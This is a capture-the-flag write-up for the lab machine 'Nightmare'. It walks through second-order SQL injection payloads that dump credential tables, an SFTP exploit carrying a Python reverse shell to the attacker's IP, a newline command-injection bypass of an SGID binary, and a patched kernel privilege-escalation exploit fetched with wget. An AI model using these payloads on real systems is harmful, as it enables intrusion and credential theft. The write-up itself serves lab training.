Nightmare write-up by 0xEA31

This writeup is splitted in two parts. The first one is about kindof intended way to get root. Turned out that there is an interesting unintended way to get root. I'll publish it in the comments, with full research details.

Before we begin, let me spend some words about the meaning of "intended". I don't like how we use it: no vulnerability is intended in the real world, they are all unintended, so to me it would be better to use "thought" or "planned" way to describe this concept.

That being said, let's start!

Lession learned

  • second order sqli
  • exploit porting 64bit >> 32bit (kindof)
  • exploit customization
  • some bash-fu
  • some markdown (editing this file)

Nmap fast

nmap -T5 -p- -vvv -oA full_T5 10.10.10.66
Nmap scan report for 10.10.10.66
Host is up, received echo-reply ttl 63 (0.058s latency).
Scanned at 2018-03-24 13:15:46 CET for 223s
Not shown: 65533 filtered ports
Reason: 65533 no-responses
PORT     STATE SERVICE      REASON
80/tcp   open  http         syn-ack ttl 63
2222/tcp open  EtherNetIP-1 syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
## Nmap done at Sat Mar 24 13:19:29 2018 -- 1 IP address (1 host up) scanned in 222.48 seconds

Educated guess:

  • 80 webserver
  • 2222 ssh

Nmap Targeted

nmap -A -p80,2222- -vvv -oA targeted 10.10.10.66
Nmap scan report for 10.10.10.66
Host is up, received echo-reply ttl 63 (0.037s latency).
Scanned at 2018-03-24 13:38:09 CET for 321s
Not shown: 63313 filtered ports
Reason: 63313 no-responses
PORT     STATE SERVICE REASON         VERSION
80/tcp   open  http    syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: NOTES
2222/tcp open  ssh     syn-ack ttl 63 (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-OpenSSH 32bit (not so recent ver)
| ssh-hostkey: 
|   1024 e2:71:84:5d:ed:07:89:98:68:8b:6e:78:da:84:4c:b5 (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAOHCAip6mgd+JAcNfKGjeMkWDcuN8ZQP[...]
|   2048 bd:1c:11:9a:5b:15:d2:f6:28:76:c3:40:7c:80:6d:ec (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC32WHYHRqHAgS/dWz1OsSr[...]
|   256 bf:e8:25:bf:ca:92:55:bc:ca:a4:96:c7:43:d0:51:73 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlz[...]
|   256 6f:14:30:b1:39:47:54:b7:5a:01:be:96:2c:a7:96:58 (EdDSA)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICzPx4ZXFPSS+s0LXmSPYN2i71QuLZfDscN8dxAOtOCJ
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.60%I=7%D=3/24%Time=5AB647EC%P=x86_64-pc-linux-gnu%r(NU
SF:LL,2B,"SSH-2\.0-OpenSSH\x2032bit\x20\(not\x20so\x20recent\x20ver\)\r\n"
SF:);
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.10 - 4.8 (92%), Linux 3.16 (92%), Linux 3.16 - 4.6 (92%), Linux 3.18 (92%), Linux 3.2 - 4.8 (92%), Linux 4.2 (92%), Linux 4.4 (92%), Linux 3.12 (90%), Linux 3.13 (90%), Linux 3.13 or 4.2 (90%)
No exact OS matches for host (test conditions non-ideal).
[...]
Uptime guess: 0.095 days (since Sat Mar 24 11:26:21 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=253 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 80/tcp)
HOP RTT      ADDRESS
1   43.14 ms 10.10.14.1
2   41.41 ms 10.10.10.66

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
## Nmap done at Sat Mar 24 13:43:30 2018 -- 1 IP address (1 host up) scanned in 323.00 seconds

Check with educated guess:

  • 80 webserver (ok)
  • 2222 SSH-2.0-OpenSSH 32bit (not so recent ver)

please note that it seems that SSH version has been removed/changed.

Web Server

With Burpsuite in background, we can browse to port 80

http://10.10.10.66/

Where we found a login form and a link to a registration form page.

                                              NOTES
Username: ____________________
Password: ____________________
* Login
* Register
     ____________________________________________________________________________________________

                                "Abandon all hope, you who enter here"
                                  "Nightmare" by Decoder & Stefano118

In register.php we can register with any username:password we like. Let's start with a:a. Once logged, in we can post notes. Long story short, any text we enter both in title (newpost) and body(<?php phpinfo();?>) is inserted in the page as is:

                                               NOTES
   Welcome a - Logout
   Title: ____________________
   Text:
   _________________________________________________________________________________________________
   _________________________________________________________________________________________________
   Insert
   Select document to upload: ____________________ Upload
     ____________________________________________________________________________________________
   newpost
   <?php phpinfo();?>
     ____________________________________________________________________________________________
                                "Abandon all hope, you who enter here"
                                  "Nightmare" by Decoder & Stefano118

The upload form seems not working, even if the uploaded file seems to reach the server, at least measuring the upload time.
Anyway, the form source code reveals a directory:

<form action="notes.php" method="post" enctype="multipart/form-data">
    Select document to upload:
    <input type="hidden" name=folder value="documents/">
    <input type="file" name="fileToUpload" id="fileToUpload">
    <input type="submit" value="Upload" name="submit">
</form>

La Divina Commedia - Inferno - Canto Primo

Let's browse to http://10.10.10.66/documents/ ...

array(4) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(9) "dante.txt" [3]=> string(9) "index.php" }

... and have a look to http://10.10.10.66/documents/dante.txt

Fwd ewrrg vwd useeaf va fgkljs nals
ea jaljgnsa hwj mfs kwdns gkumjs,
uzé ds vajalls nas wjs kesjjals.
[..]

Text is in unicode, and it is a rot(8) of the "Primo canto della Divina Commedia".

Nel mezzo del cammin di nostra vita
mi ritrovai per una selva oscura,
ché la diritta via era smarrita.
[...]

Since one of the authors of this box is the same of the Minion box (Decoder), this seems to be another tribute to Dante.
Anyway, we can confirm that the upload form isn't working (at least it does not upload anything here).

Second order sqli

Since the text seems to be inserted in the database as is, we may try some second order sqli on the register.php/notes.php pair of pages. So we can register these "usernames" (password whatever you may like: I used 'a' (without quotes)). You can see the output on the right:

'             >> SQL ERROR
'##            >> SQL ERROR
'--           >> SQL ERROR
a' or 1=1 #'  >> nothing (neither output nor errors)
')#'          >> nothing (neither output nor errors)

Let's try to get the number of columns:

') union select 1#'   >> SQL ERROR
') union select 1,2#' >> prints 1,2

so: the query has two columns. Let's use them:

') union SELECT TABLE_SCHEMA, TABLE_NAME FROM INFORMATION_SCHEMA.TABLES #'

notes
notes

notes
users

sysadmin
configs

sysadmin
users

## usernames and passwords from notes database

') union SELECT username, password FROM notes.users #'
admin
ee10c315eba2c75b403ea99136f5b48d
nightmare
ae719e828367a0c8f268eb996322eba4

## usernames and passwords from notes database (results edited manually to make them more readable)
') union SELECT username, password FROM sysadmin.users #'

admin:nimda
cisco:cisco123
adminstrator:Pyuhs738?183*hjO!
josh:tontochilegge
system:manager
root:HasdruBal78
decoder:HackerNumberOne!
ftpuser:@whereyougo?
sys:change_on_install
superuser:passw0rd
user:odiolafeta

If we use https://crackstation.net/ or https://hashkiller.co.uk/md5-decrypter.aspx we get ee10c315eba2c75b403ea99136f5b48d >> nimda and ae719e828367a0c8f268eb996322eba4 >> [Not found]

Exploiting sftp

With that list of creds, we can try to login info the SFTP server. The easiest try is with metasploit auxiliary/scanner/ssh/ssh_login module, that shows us ftpuser:@whereyougo? as a working credential.

With this piece of information we can try to login to SSH (as I told the banner has been tamepered):

ssh -t [email protected] -p 2222 
PTY allocation request failed on channel 0

Nasty error, may be that is something related with the default shell?

ssh -t [email protected] -p 2222 'id'
PTY allocation request failed on channel 0

No. It seems to be only a sftp OpenSSH deamon. Let's explore the content of the box, for instance with Filezilla.
We can find a lot of things, including all the php source code, and mysql credentials and so on, but nothing that seems to be exploitable.

Out of ideas, I asked Google: sftp OpenSSH exploit which promptly replayed with : http://seclists.org/fulldisclosure/2014/Oct/35, a handy OpenSSH <=6.6 SFTP misconfiguration exploit for 64bit Linux waiting for us.

But do we have a 32 bit sftp deamon, isn't is? Let's google deeper with a "32 bit" addenda. Turns out that I stroke it lucky, because if you try now, you may have to ask Google to limit his search after February 1th in order to get:

https://www.secforce.com/blog/2018/03/openssh_exploit_32_and_64_bit/
https://github.com/SECFORCE/sftp-exploit/blob/master/sftp-exploit.py

As you can read, this is a 32 bit porting of that quite old 64 bit exploit, published after Nightmare went online. Since I think that I never could be so smart even start to port an explot from 64 to 32 bit, please read that blog post to fully understand how it works.

So, can this step be done script kiddie way, i.e. copy/paste/modify/run the script?
No, because we have to remember that we cannot write anywhere and we have to use one of the two "allowed" port, 80 or 443 (just in case we forgot that this is an insane box...).
Since a locate python confirms that this software is installed, we can use a python reverse shell:

cmd = "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.83\",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
host = '10.10.10.66'
port = 2222
username = 'ftpuser'
password = '@whereyougo?'

which provide us a www-data owned reverse shell.

Becoming decoder (kind of...)

Once we have a shell, let's try a quick win:

uname -a
Linux nightmare 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

As with SSH (do you remember nmap output for port 2222 ?), part of the description has been changed ([-xenial-] >> [+nightmare+]) but the version 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 is still enough to find a kernel exploit with google.

google "4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51" exploit

Yes!, got it! https://www.exploit-db.com/exploits/43418/ and https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c

Ehmmm, kind of... Since the authors put a lot of time on hardening the box, every file seems to be readonly to sftpuser and we cannot find any place to put our code. Moreover, some commands are disabled with ACLs. Among the others we cannot use:

getfacls
ps
top
pstree

We can use, at least, find with some bash-fu:

find / -user decoder 2>&1 | grep -v denied | grep -v directory | xargs ls -la
-rw-r-----  1 decoder decoder  220 Sep  1  2015 /home/decoder/.bash_logout
-rw-r-----  1 decoder decoder 3771 Sep  1  2015 /home/decoder/.bashrc
-rw-r-----  1 decoder decoder  675 Sep  1  2015 /home/decoder/.profile
-r--r-----+ 1 decoder decoder   33 Sep 12  2017 /home/decoder/user.txt

find / -group decoder 2>&1 | grep -v denied | grep -v directory | xargs ls -la
-rw-r-----  1 decoder decoder  220 Sep  1  2015 /home/decoder/.bash_logout
-rw-r-----  1 decoder decoder 3771 Sep  1  2015 /home/decoder/.bashrc
-rw-r-----  1 decoder decoder  675 Sep  1  2015 /home/decoder/.profile
-r--r-----+ 1 decoder decoder   33 Sep 12  2017 /home/decoder/user.txt
-rwxr-sr-x  1 root    decoder 9016 Feb 18  2016 /usr/bin/sls

/home/decoder:
total 28
drwxr-xr-x  3 root    decoder 4096 Sep 28  2017 .
drwxr-xr-x  3 root    root    4096 Sep 30  2017 ..
-rw-------  1 root    root       0 Sep 13  2017 .bash_history
-rw-r-----  1 decoder decoder  220 Sep  1  2015 .bash_logout
-rw-r-----  1 decoder decoder 3771 Sep  1  2015 .bashrc
-rw-r-----  1 decoder decoder  675 Sep  1  2015 .profile
drwx-wx--x  2 root    decoder 4096 Apr  9 15:37 test
-r--r-----+ 1 decoder decoder   33 Sep 12  2017 user.txt
ls: cannot open directory '/home/decoder/test': Permission denied

Let's twiddle this inviting SGID /usr/bin/sls binary:

/usr/bin/sls
bin
boot
dev
etc
[...]
/usr/bin/sls /home
decoder
/usr/bin/sls -la /home
total 12
drwxr-xr-x   3 root root    4096 Sep 30  2017 .
drwxr-xr-x+ 24 root root    4096 Sep 30  2017 ..
drwxr-xr-x   3 root decoder 4096 Sep 28  2017 decoder

/usr/bin/sls nonsense
/bin/ls: cannot access 'nonsense': No such file or directory

So, it seems that it invokes /bin/ls, let's issue some other commands on the remote machine:

strings /usr/bin/sls
objdump /usr/bin/sls -x

So, it uses strlen(), system(), strchr() and there are some weird strings.

It's better to donwload the file via SFTP and analyze it with gdb/peda to understand what's going on:

gdb sls
disass main
## copy the result on a file grep @plt that file

   0x000000000040078f <+41>:    call   0x400610 <[email protected]>
   0x0000000000400827 <+193>:   call   0x4005d0 <[email protected]>
   0x0000000000400849 <+227>:   call   0x4005d0 <[email protected]>
   0x000000000040085f <+249>:   call   0x400620 <[email protected]>
   0x00000000004008b7 <+337>:   call   0x400630 <[email protected]>
   0x00000000004008ef <+393>:   call   0x400650 <[email protected]>
   0x0000000000400905 <+415>:   call   0x4005f0 <[email protected]>
   0x000000000040091a <+436>:   call   0x400640 <[email protected]>
   0x0000000000400932 <+460>:   call   0x4005f0 <[email protected]>
   0x0000000000400941 <+475>:   call   0x400640 <[email protected]>
   0x000000000040095d <+503>:   call   0x4005e0 <[email protected]>
   0x0000000000400969 <+515>:   call   0x4005c0 <[email protected]>

That is to say:

allocate some memory  
check len  
reallocate memory  
concatenate strings  
check for substring  
check for char  
invoke sth via system  
free  

We have already seen that /bin/ls is invoked, so we may suppose that system() is used for that.
We have already seen that issuing /usr/bin/sls -la results in a /bin/ls -la command. So may be that /usr/bin/sls args are concatenated into the final command. Let's check:

b main
b *0x00000000004008b7
r -la honolulu

0 ("/bin/ls ")
RBX: 0x7 
RCX: 0xfffffffffffffff7 
RDX: 0x7ffdbce4f3f8 --> 0x6f6e6f6800616c2d ('-la')
RSI: 0x7ffdbce4f3f8 --> 0x6f6e6f6800616c2d ('-la')
RDI: 0xe6f260 ("/bin/ls ")
RBP: 0x7ffdbce4ed90 --> 0x400980 (<__libc_csu_init>:    push   r15)
RSP: 0x7ffdbce4ed50 --> 0x7ffdbce4ee78 --> 0x7ffdbce4f3d7 ("/root/Documents/Nightmare_66/sls")
RIP: 0x4008b7 (<main+337>:  call   0x400630 <[email protected]>)
R8 : 0x7fe9a0825c40 --> 0x0 
R9 : 0x7fe9a0512eb0 (<__wcpcpy>:    sub    rsi,rdi)
R10: 0x201 
R11: 0x7fe9a04f3cb0 (<__GI___libc_realloc>: push   r15)
R12: 0x400670 (<_start>:    xor    ebp,ebp)
R13: 0x7ffdbce4ee70 --> 0x3 
R14: 0x0 
R15: 0x0
EFLAGS: 0x212 (carry parity ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4008ad <main+327>: mov    rax,QWORD PTR [rbp-0x28]
   0x4008b1 <main+331>: mov    rsi,rdx
   0x4008b4 <main+334>: mov    rdi,rax
=> 0x4008b7 <main+337>: call   0x400630 <[email protected]>
   0x4008bc <main+342>: add    DWORD PTR [rbp-0x2c],0x1
   0x4008c0 <main+346>: mov    eax,DWORD PTR [rbp-0x2c]
   0x4008c3 <main+349>: cmp    eax,DWORD PTR [rbp-0x34]
   0x4008c6 <main+352>: jl     0x4007b5 <main+79>
Guessed arguments:
arg[0]: 0xe6f260 ("/bin/ls ")
arg[1]: 0x7ffdbce4f3f8 --> 0x6f6e6f6800616c2d ('-la')
arg[2]: 0x7ffdbce4f3f8 --> 0x6f6e6f6800616c2d ('-la')
[------------------------------------stack-------------------------------------]
0000| 0x7ffdbce4ed50 --> 0x7ffdbce4ee78 --> 0x7ffdbce4f3d7 ("/root/Documents/Nightmare_66/sls")
0008| 0x7ffdbce4ed58 --> 0x3004009cd 
0016| 0x7ffdbce4ed60 --> 0x1000000e0 
0024| 0x7ffdbce4ed68 --> 0xe6f260 ("/bin/ls ")
0032| 0x7ffdbce4ed70 --> 0x400980 (<__libc_csu_init>:   push   r15)
0040| 0x7ffdbce4ed78 --> 0x400a04 ("|`&><'\"\\[]{};")                         #'
0048| 0x7ffdbce4ed80 --> 0x7ffdbce4ee70 --> 0x3 
0056| 0x7ffdbce4ed88 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 3, 0x00000000004008b7 in main ()

ni

[----------------------------------registers-----------------------------------]
RAX: 0xe6f260 ("/bin/ls -la")
RBX: 0x7 
RCX: 0x7fe9a050f5c0 (<__strcat_sse2_unaligned+1616>:    mov    edx,DWORD PTR [rsi])
RDX: 0x616c2d ('-la')
RSI: 0x7ffdbce4f3f8 --> 0x6f6e6f6800616c2d ('-la')
RDI: 0xe6f268 --> 0x616c2d ('-la')
RBP: 0x7ffdbce4ed90 --> 0x400980 (<__libc_csu_init>:    push   r15)
RSP: 0x7ffdbce4ed50 --> 0x7ffdbce4ee78 --> 0x7ffdbce4f3d7 ("/root/Documents/Nightmare_66/sls")
RIP: 0x4008bc (<main+342>:  add    DWORD PTR [rbp-0x2c],0x1)
R8 : 0x7fe9a0825c40 --> 0x0 
R9 : 0xe6f260 ("/bin/ls -la")
R10: 0x4de 
R11: 0x7fe9a05e9c94 --> 0xfff2590cfff258fc 
R12: 0x400670 (<_start>:    xor    ebp,ebp)
R13: 0x7ffdbce4ee70 --> 0x3 
R14: 0x0 
R15: 0x0
EFLAGS: 0x206 (carry PARITY adjust zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x4008b1 <main+331>: mov    rsi,rdx
   0x4008b4 <main+334>: mov    rdi,rax
   0x4008b7 <main+337>: call   0x400630 <[email protected]>
=> 0x4008bc <main+342>: add    DWORD PTR [rbp-0x2c],0x1
   0x4008c0 <main+346>: mov    eax,DWORD PTR [rbp-0x2c]
   0x4008c3 <main+349>: cmp    eax,DWORD PTR [rbp-0x34]
   0x4008c6 <main+352>: jl     0x4007b5 <main+79>
   0x4008cc <main+358>: mov    rax,QWORD PTR [rbp-0x28]
[------------------------------------stack-------------------------------------]
0000| 0x7ffdbce4ed50 --> 0x7ffdbce4ee78 --> 0x7ffdbce4f3d7 ("/root/Documents/Nightmare_66/sls")
0008| 0x7ffdbce4ed58 --> 0x3004009cd 
0016| 0x7ffdbce4ed60 --> 0x1000000e0 
0024| 0x7ffdbce4ed68 --> 0xe6f260 ("/bin/ls -la")
0032| 0x7ffdbce4ed70 --> 0x400980 (<__libc_csu_init>:   push   r15)
0040| 0x7ffdbce4ed78 --> 0x400a04 ("|`&><'\"\\[]{};")                         #'
0048| 0x7ffdbce4ed80 --> 0x7ffdbce4ee70 --> 0x3 
0056| 0x7ffdbce4ed88 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00000000004008bc in main ()

ni
[...]
ni

[----------------------------------registers-----------------------------------]
RAX: 0xe6f260 ("/bin/ls -la honolulu")
RBX: 0xb ('\x0b')
RCX: 0x756c756c6f6e6f68 ('honolulu')
RDX: 0x0 
RSI: 0x75 ('u')
RDI: 0xe6f260 ("/bin/ls -la honolulu")
RBP: 0x7ffdbce4ed90 --> 0x400980 (<__libc_csu_init>:    push   r15)
RSP: 0x7ffdbce4ed50 --> 0x7ffdbce4ee78 --> 0x7ffdbce4f3d7 ("/root/Documents/Nightmare_66/sls")
RIP: 0x40095d (<main+503>:  call   0x4005e0 <[email protected]>)
R8 : 0xfff1e000 
R9 : 0xe6f260 ("/bin/ls -la honolulu")
R10: 0x6fa 
R11: 0x7fe9a0506940 (<__strchr_sse2>:   movd   xmm1,esi)
R12: 0x400670 (<_start>:    xor    ebp,ebp)
R13: 0x7ffdbce4ee70 --> 0x3 
R14: 0x0 
R15: 0x0
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x400954 <main+494>: jne    0x40091f <main+441>
   0x400956 <main+496>: mov    rax,QWORD PTR [rbp-0x28]
   0x40095a <main+500>: mov    rdi,rax
=> 0x40095d <main+503>: call   0x4005e0 <[email protected]>
   0x400962 <main+508>: mov    rax,QWORD PTR [rbp-0x28]
   0x400966 <main+512>: mov    rdi,rax
   0x400969 <main+515>: call   0x4005c0 <[email protected]>
   0x40096e <main+520>: mov    eax,0x0
Guessed arguments:
arg[0]: 0xe6f260 ("/bin/ls -la honolulu")
[------------------------------------stack-------------------------------------]
0000| 0x7ffdbce4ed50 --> 0x7ffdbce4ee78 --> 0x7ffdbce4f3d7 ("/root/Documents/Nightmare_66/sls")
0008| 0x7ffdbce4ed58 --> 0x3004009cd 
0016| 0x7ffdbce4ed60 --> 0x3000000e0 
0024| 0x7ffdbce4ed68 --> 0xe6f260 ("/bin/ls -la honolulu")
0032| 0x7ffdbce4ed70 --> 0xe6f274 --> 0x20d9100000000 
0040| 0x7ffdbce4ed78 --> 0x400a04 ("|`&><'\"\\[]{};")                         #'
0048| 0x7ffdbce4ed80 --> 0x7ffdbce4ee70 --> 0x3 
0056| 0x7ffdbce4ed88 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Breakpoint 1, 0x000000000040095d in main ()

As we can see (0024| 0x7ffdbce4ed68 --> 0xe6f260 ("/bin/ls -la honolulu")) the command is actually concatenated as supposed.

With further debugging we can understand more sls internals. Long story short, if we fire /usr/bin/sls with -b there are two filters, one for the string $( and another one for any of these chars: |``&><'\"\\[]{}; everything that passes these filters is sent to a system() call to /bin/ls.

But how can we bypass both filters and have our desired command executed? Turned out that we have it at our fingertips: what's the behavior of bash when we do not close a quote/double quote and hit enter? It goes on accepting multiple lines of commands, until we close it, when it executes all the commands, one after the other [Token recognition].

Let's try it locally:

sh -c '
ls -la
id
whoami
'
[...]

Did you usually ctrl+c when you mistype a ' in a shell? Bad bet!

So to bypass these filters "just":

/usr/bin/sls -b '
id'

or

/usr/bin/sls -b "
id"

or

bash
/usr/bin/sls -b $'\nid' #will not work if issued on a sh

Please note that both ' and " are included in the forbidden forest chars |``&><'\"\\[]{};. If you wonder why they work there, it's because they are processed before the entire block of commands is sent to /usr/bin/sls.

/usr/bin/sls -b "
bash -ip"
bash-4.3$ id
uid=1002(ftpuser) gid=1002(ftpuser) egid=1001(decoder) groups=1001(decoder),1002(ftpuser)

so we are not decoder, but member of decoder group. As I said "kind of" decoder. Enough to cat /home/decoder/user.txt

Becoming root - Kernel exploit as decoder (kind of...)

As we have already seen, long time ago,

uname -a
Linux nightmare 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux

led us to a kernel exploit. Since it autodetects distro (/etc/lsb-release) and kernel version (via uname) , we have to change poc.c to mypoc.c. adding a few lines of code.

--- /root/Documents/Nightmare_66/poc.c
+++ /root/Documents/Nightmare_66/mypoc.c
@@ -128,6 +128,7 @@
    { "xenial", "4.8.0-54-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x301f2d, 0x119207, 0x1b170, 0x43a0da, 0x5ada3c, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
    { "xenial", "4.8.0-56-generic", 0xa5d00, 0xa60f0, 0x17c55, 0x39d50d, 0x119207, 0x1b170, 0x43a14a, 0x44d4a0, 0x7bd03, 0x12c7d7, 0x64210, 0x49f60 },
    { "xenial", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
+   { "bladerunner", "4.8.0-58-generic", 0xa5d20, 0xa6110, 0x17c55, 0xe56f5, 0x119227, 0x1b170, 0x439e7a, 0x162622, 0x7bd23, 0x12c7f7, 0x64210, 0x49fa0 },
 };

 // Used to get root privileges.
@@ -328,7 +329,9 @@
    if (strcmp("xenial", kernels[kernel].distro) == 0 &&
        strncmp("4.8.0", kernels[kernel].version, 5) == 0)
        return get_kernel_addr_xenial(syslog, size);
-
+   if (strcmp("bladerunner", kernels[kernel].distro) == 0 &&
+       strncmp("4.8.0", kernels[kernel].version, 5) == 0)
+       return get_kernel_addr_xenial(syslog, size);    
    printf("[-] KASLR bypass only tested on trusty 4.4.0-* and xenial 4-8-0-*");
    exit(EXIT_FAILURE);
 }

after that we can compile it locally gcc mypoc.c -o mypoc, wget mypoc to /home/decoder/test/ and chmod 770 mypoc as decoder (kind of) and fire it as ftpuser, since decoder is untouchable.

wget http://10.10.14.188/mypoc
chmod 770 mypoc
ls -la mypoc
-rwxrwx--- 1 ftpuser decoder 28032 Mar 28 21:31 mypoc
bash-4.3$ exit
$ id
uid=1002(ftpuser) gid=1002(ftpuser) groups=1002(ftpuser)
$ /home/decoder/test/mypoc
bash: cannot set terminal process group (20833): Inappropriate ioctl for device
bash: no job control in this shell
[email protected]:/# id
id
uid=0(root) gid=0(root) groups=0(root)

we are root and, of course we can

[email protected]:/#cat root/root.txt
[...]

0xEA31

Comments

  • It seems that I cannot put the unintened way as a comment. Funny, as someone else says.

    I'll put it in another post in a while...

    0xEA31

Sign In to comment.